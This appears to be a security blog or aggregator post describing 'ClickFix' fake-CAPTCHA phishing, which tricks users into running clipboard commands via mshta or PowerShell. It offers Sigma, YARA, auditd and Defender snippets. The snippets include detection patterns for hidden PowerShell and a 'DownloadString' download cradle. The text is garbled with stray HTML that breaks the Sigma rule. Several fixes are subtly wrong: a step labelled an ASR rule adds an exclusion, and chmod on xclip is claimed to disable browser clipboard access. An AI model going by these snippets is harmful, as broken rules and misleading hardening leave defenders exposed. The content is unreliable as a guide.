Detection Alert: #ClickFix #FakeCaptcha | Sigma Rule

⚠️ #Phishing Just Got More Dangerous! Hackers are using FAKE CAPTCHA pop-ups to infect systems! This sneaky phishing attack tricks users into running malware through Windows Run commands—leading to credential theft, RAT infections, and full system compromise. This method is being used to distribute Lumma Stealer, AsyncRAT, NetSupport RAT, and more.

How This Attack Works (Sigma Rule Detection)

1️⃣ Phishing email or malicious website delivers the trap.
2️⃣ A fake “I am not a robot” CAPTCHA appears.
3️⃣ Clicking injects a hidden malicious command into your clipboard.
4️⃣ You’re told to press Windows + R and execute the clipboard content.
5️⃣ This abuses LOLBins (mshta.exe, powershell.exe) to execute remote malware!

Why This is Dangerous?

🚫 Not a typical phishing attack.

🚫 Directly executes remotely hosted malicious files in memory without dropping payloads.

How to Stay Safe?

✅ NEVER execute clipboard commands blindly.

✅ Restrict script execution from the Run dialog.

✅ Report & block suspicious sites ASAP.

You Should Know:

Detecting & Mitigating Fake CAPTCHA Attacks

• Sigma Rule Detection:

  title: Fake CAPTCHA Clipboard Injection via Run Dialog 
  description: Detects execution of malicious commands via Run dialog from clipboard 
  logsource: 
  product: windows 
  service: security 
  detection: 
  selection: 
  EventID: 4688 
  CommandLine: </li>
  <li>"<em>mshta.exe</em>" </li>
  <li>"*powershell -nop -w hidden -c *" 
  condition: selection 
  

• Blocking LOLBin Abuse:

  </p></li>
  </ul>
  
  <h1>Restrict mshta.exe & powershell.exe execution</h1>
  
  <p>Set-MpPreference -AttackSurfaceReductionRules_Ids "5BEB7EFE-FD9A-4556-801D-275E5FFC04CC" -AttackSurfaceReductionRules_Actions Enabled 
  

  • Monitor Clipboard Execution:

    </li>
    </ul>
    
    <h1>Linux (Auditd Rule)</h1>
    
    auditctl -a always,exit -F arch=b64 -S execve -F path=/usr/bin/xclip -k clipboard_monitor 
    

    • Windows Defender ASR Rule:

      powershell -Command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions 'C:\trusted\path\'" 
      

    References:

    • Sigma Rule for Fake CAPTCHA
    • LOLBin Mitigation Guide

    What Undercode Say:

    Fake CAPTCHA attacks exploit human trust in security mechanisms. Defenders must:
    – Audit Run Dialog executions (EventID 4688 in Windows).
    – Disable clipboard-based execution via GPO (gpedit.msc).
    – Use YARA rules to detect malicious scripts in memory:

    rule Fake_CAPTCHA_PS { 
    strings: 
    $s1 = "IEX (New-Object Net.WebClient).DownloadString" 
    condition: 
    any of them 
    } 
    

    – Linux hardening against similar attacks:

    
    <h1>Disable clipboard access in browsers</h1>
    
    chmod -x /usr/bin/xclip 
    

    Expected Output:

    • Detection logs for mshta.exe/powershell.exe execution.
    • Blocked RAT payloads via ASR rules.
    • User awareness training on fake CAPTCHA scams.

    Stay vigilant—verify before you execute! 🔐

    References:

    Reported By: Swachchhanda Shrawan – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    Join Our Cyber World:

    💬 Whatsapp | 💬 Telegram